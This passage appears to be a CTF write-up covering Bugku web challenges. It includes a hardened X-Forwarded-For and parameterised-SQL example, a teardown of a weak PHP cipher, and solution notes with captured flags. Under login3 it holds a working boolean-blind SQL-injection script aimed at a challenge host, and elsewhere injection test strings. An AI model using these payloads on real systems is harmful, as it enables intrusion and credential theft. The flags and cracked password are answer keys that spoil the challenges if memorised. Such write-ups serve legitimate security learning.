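# Constructed: the only reverse proxy allowed to set X-Forwarded-For.
TRUSTED_PROXIES = {"10.0.0.5"}


def client_ip(remote_addr, xff_header=None):
    """Hardened getIp(): honour X-Forwarded-For only when the direct peer is a trusted
    proxy, take the LAST hop (the one that proxy appended) rather than the first, and
    reject anything that is not an IP address. Returns (ip_or_None, reason)."""
    if xff_header is not None and remote_addr in TRUSTED_PROXIES:
        hops = [h.strip() for h in xff_header.split(",") if h.strip()]
        candidate = hops[-1] if hops else ""
    else:
        candidate = remote_addr          # untrusted peer: ignore the header entirely
    try:
        return str(ipaddress.ip_address(candidate)), "ok"
    except ValueError:
        # quotes, spaces, SQL fragments: none of it is an address, none of it reaches the query
        return None, "invalid address: %r" % candidate


def record_visit(conn, ip):
    """Parameterised INSERT: the driver binds the value, so it is data, never SQL."""
    conn.execute("INSERT INTO client_ip (ip) VALUES (?)", (ip,))
    conn.commit()


def new_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE client_ip (ip TEXT)")
    return conn


def handle_request(remote_addr, xff_header=None):
    """One request through the hardened path. Returns (stored_rows, reason)."""
    conn = new_db()
    ip, reason = client_ip(remote_addr, xff_header)
    if ip is not None:
        record_visit(conn, ip)
    rows = [row[0] for row in conn.execute("SELECT ip FROM client_ip")]
    return rows, reason


def stored_literally(value):
    """Shows what binding buys even if validation were skipped: the value is stored
    character for character, quotes included, instead of being parsed as SQL."""
    conn = new_db()
    record_visit(conn, value)
    return conn.execute("SELECT ip FROM client_ip").fetchone()[0]


if __name__ == "__main__":
    # constructed requests: a real proxied client, a spoof through the proxy,
    # a direct client sending its own XFF, and a non-address value
    for peer, xff in (("10.0.0.5", "203.0.113.9"),
                      ("10.0.0.5", "127.0.0.1, 203.0.113.9"),
                      ("198.51.100.7", "127.0.0.1"),
                      ("10.0.0.5", "127.0.0.1' or '1'='1")):
        print(peer, repr(xff), "->", handle_request(peer, xff))
```

The first check is what closes the "Administrator system" spoof: a client-supplied 127.0.0.1 arrives as the first hop, and the address the proxy vouches for is the last one. The bound parameter is what closes the injection; the address validation simply means no SQL-shaped value is ever stored in the first place.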

38. This is a magic login box

www.qingpingshan.com/m/view.php?… flag{ed6b28e684817d9efcaf802979e57aea}

39. Multiple

Analysis: Blog.csdn.net/xuchen16/ar…

flag{Bugku-sql_6s-2i-4t-bug} from www.jianshu.com/p/ae6e5a885…

40. PHP_encrypt_1 (ISCCCTF)

Description: fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA= is given together with the encryption source:

<?php
function encrypt($data, $key)
{
    $key = md5('ISCC');
    $x = 0;
    $len = strlen($data);
    $klen = strlen($key);
    for ($i = 0; $i < $len; $i++) {
        if ($x == $klen)
        {
            $x = 0;
        }
        $char .= $key[$x];
        $x += 1;
    }
    for ($i = 0; $i < $len; $i++) {
        $str .= chr((ord($data[$i]) + ord($char[$i])) % 128);
    }
    return base64_encode($str);
}
?>

The decryption code directly:

<?php
function decrypt($str) {
    $mkey = "729623334f0aa2784a1599fd374c120d";   // md5('ISCC')
    $klen = strlen($mkey);
    $x = 0;
    $tmp = $str;
    $tmp = base64_decode($tmp);   // base64-decode the ciphertext
    $md_len = strlen($tmp);       // length of the ciphertext
    for ($i = 0; $i < $md_len; $i++) {   // build the repeating key stream
        if ($x == $klen)          // wrap around when the key is exhausted
            $x = 0;
        $char .= $mkey[$x];       // next key byte
        $x += 1;
    }
    $md_data = array();
    for ($i = 0; $i < $md_len; $i++) {   // ciphertext bytes as integers
        array_push($md_data, ord($tmp[$i]));
    }
    $md_data_source = array();
    $data1 = "";
    $data2 = "";
    foreach ($md_data as $key => $value) {   // undo the offset
        $i = $key;
        if ($i >= strlen($mkey)) { $i = $i - strlen($mkey); }
        $dd = $value;
        $od = ord($mkey[$i]);
        array_push($md_data_source, $dd);
        $data1 .= chr(($dd + 128) - $od);   // first possibility: remainder + 128 - key byte
        $data2 .= chr($dd - $od);           // second possibility: remainder - key byte
    }
    print "data1 => ".$data1."<br>\n";
    print "data2 => ".$data2."<br>\n";
}
$str = "fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=";
decrypt($str);
?>

The flag format is odd as well... Flag:{asdqwdfasfdawfefqwdqwdadwqadawd}
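The scheme above is a repeating-key additive cipher: each plaintext byte has one hex digit of md5('ISCC') added to it modulo 128. Because addition modulo 128 is invertible, subtraction modulo 128 is the whole inverse, and the two "possibilities" the PHP decrypt() prints collapse into one formula. The following Python is an added re-implementation, not the challenge's code: it encrypts and decrypts exactly as the PHP does, and shows why the design is weak, since one known plaintext/ciphertext pair gives back the key stream, and the "key" is only the MD5 of a constant. The ciphertext is the one given in the challenge; the sample plaintext in the usage section is constructed.

```python
import base64
import hashlib

# The PHP code ignores the $key argument and always uses md5('ISCC').
KEY = hashlib.md5(b"ISCC").hexdigest()   # 32 hex digits used as the key
CIPHERTEXT = "fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA="   # from the challenge


def keystream(length):
    """One key byte per plaintext byte, cycling through the 32 hex digits as the PHP loop does."""
    return [ord(KEY[i % len(KEY)]) for i in range(length)]


def encrypt(plaintext):
    """chr((ord(data[i]) + ord(key[i])) % 128) for every byte, then base64, as in encrypt()."""
    data = plaintext.encode("ascii")
    out = bytes((p + k) % 128 for p, k in zip(data, keystream(len(data))))
    return base64.b64encode(out).decode("ascii")


def decrypt(ciphertext):
    """The exact inverse: subtract the key byte modulo 128."""
    data = base64.b64decode(ciphertext)
    out = bytes((c - k) % 128 for c, k in zip(data, keystream(len(data))))
    return out.decode("ascii")


def recover_keystream(plaintext, ciphertext):
    """Why the scheme gives no secrecy: k = (c - p) mod 128, so a single known
    plaintext/ciphertext pair reveals the key stream, and with it every other message."""
    data = base64.b64decode(ciphertext)
    return "".join(chr((c - p) % 128) for c, p in zip(data, plaintext.encode("ascii")))


if __name__ == "__main__":
    print("key:", KEY)
    print("decrypted:", decrypt(CIPHERTEXT))
    sample = "constructed sample plaintext, forty chars!"   # constructed known plaintext
    print("recovered key stream:", recover_keystream(sample, encrypt(sample))[:32])
```

Decrypting the challenge ciphertext yields 38 bytes beginning with "Flag:{" and ending with "}", which matches the oddly formatted flag above; the recovered key stream equals KEY, which is the point a defender should take away: a key derived from a public constant and a cipher that is linear in the plaintext protect nothing.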

41. File contains 2

php://filter can read the source,

but scanning with Yujian (御剑) turned up an upload.

flag.php is found; open flag.php:

SKCTF{uP104D_1nclud3_426fh8_is_Fun}

42. flag.php

http://123.206.87.240:8002/flagphp/ Description: clicking login gives no response at all; hint

findneo.github.io/180406bugku…

flag{unserialize_by_virink}

43. SQL injection 2

Could not find the injection point at first; in the end, with no other way, I scanned the directory and found a .DS_Store source leak. After pulling the source down, I finally went straight to http://120.24.86.145:8007/web2/flag

Flag: flag{sql_iNJEct_comMon3600!}

44. Sun XX's blog

http://123.206.87.240:2014/

45. Trim's diary

"Don't give up at once or give up as soon as possible"... The login injection is very weak; scanning with Yujian (御剑) gives http://123.206.87.240:9002/show.php. Visiting that page gives the flag; why is this worth 200 points...

From blog.csdn.net/zz_Caleb/ar…

flag1:{0/m9o9PDtcSyu7Tt}

46. login2 (SKCTF)

http://123.206.31.85:49165/ SKCTF{XXXXXXXXXXXXXXXXXXXXX} hint: union, command execution

SKCTF{Uni0n_@nd_c0mM4nD_exEc}

From blog.csdn.net/zazazrt/art…

47. login3 (SKCTF)

http://123.206.31.85:49167/ flag format: SKCTF{XXXXXXXXXXXXX} hint: boolean-based blind SQL injection. Reference www.zjzhhb.com/archives/28… Fuzzing shows that spaces are filtered (bypass with parentheses) and that = is filtered (bypass with <>).

Straight to the script:

import requests
import string
import re

url = 'http://123.206.31.85:49167/'
sss = string.digits + string.ascii_lowercase
answer = ''
for i in range(1, 50):
    flag = 0
    for j in sss:
        postuser = "'^(select(ascii(mid((select(password)from(admin))from(%d)))<>%d))^1#" % (i, ord(j))
        data = {'username': postuser, 'password': 'admin'}
        html = requests.post(url, data=data).text
        # the message sits inside an HTML element whose tags were lost in the page extraction; <p> is assumed here
        html = re.findall(r"<p>(.*?)</p>", html, re.S)[0]
        if 'username does not exist!' in html:
            answer += j
            flag = 1
            print(answer)
            break
    if flag == 0:
        break
print('password is ', answer)

The result 51b7a76d51e70b419f60d3473fb6f900 is the MD5 of the password; look it up at www.somd5.com/

Admin password: skctf123456. Return to http://123.206.31.85:49167/index.php

SKCTF{b1iNd_SQL_iNJEcti0n!}

50. login4

http://123.206.31.85:49168/ flag format: SKCTF{XXXXXXXXXXXXXXXX} hint: CBC byte-flipping attack

Reference blog.csdn.net/zpy1998zpy/…

www.jianshu.com/p/a61756e54…

Flag

SKCTF{CBC_wEB_cryptography_6646dfgdg6}